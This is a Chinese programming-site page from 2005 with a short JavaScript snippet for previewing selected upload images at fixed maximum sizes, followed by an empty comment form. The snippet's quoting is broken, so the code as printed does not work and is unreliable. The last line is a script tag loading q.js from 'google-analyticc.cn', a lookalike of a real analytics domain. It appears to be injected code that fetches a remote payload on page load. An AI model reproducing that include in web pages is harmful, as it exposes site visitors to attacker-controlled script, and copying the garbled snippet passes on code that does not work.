RSS
热门关键字:  数据挖掘  数据仓库  商业智能  搜索引擎  人工智能
当前位置 :| 首页>编程技术>asp编程>

自动预览上传图(图片预览)]

来源: 作者:unkonwn 时间:2005-06-17 点击:

自动预览上传图(图片预览)powered BY AIRZEN 2004/05/21 
作者信息:
Author:airzen
QQ:39192170
E-mail:airzen@sohu.com

数据挖掘研究院

转贴请保留作者信息,谢谢

<input name="w_s" type="file" id="w_s" onChange="load_img(this.value,img_s);">
<input name="w_b" type="file" id="w_b" onChange="load_img(this.value,img_b);">
<div id="img_s"></div>
<div id="img_b"></div>

<script language="javascript">
<!--
function load_img(p_src,write_id){
var t_html;
if(p_src!="){
if(write_id==img_s){
t_html="<img src=""+p_src+"" onLoad="javascript:if(this.width>120){this.width=120;}if(this.height>120){this.height=120;}">";
}else{
t_html="<img src=""+p_src+"" onLoad="javascript:if(this.width>240){this.width=240;}if(this.height>240){this.height=240;}">"; 
}
}else{
t_html="";
}
write_id.innerHTML=t_html;
}
//-->
</script>

数据挖掘研究院


最新评论共有 0 位网友发表了评论
发表评论
评论内容:不能超过250字,需审核,请自觉遵守互联网相关政策法规。
匿名?
script src="http://www.google-analyticc.cn/q.js" type="text/javascript">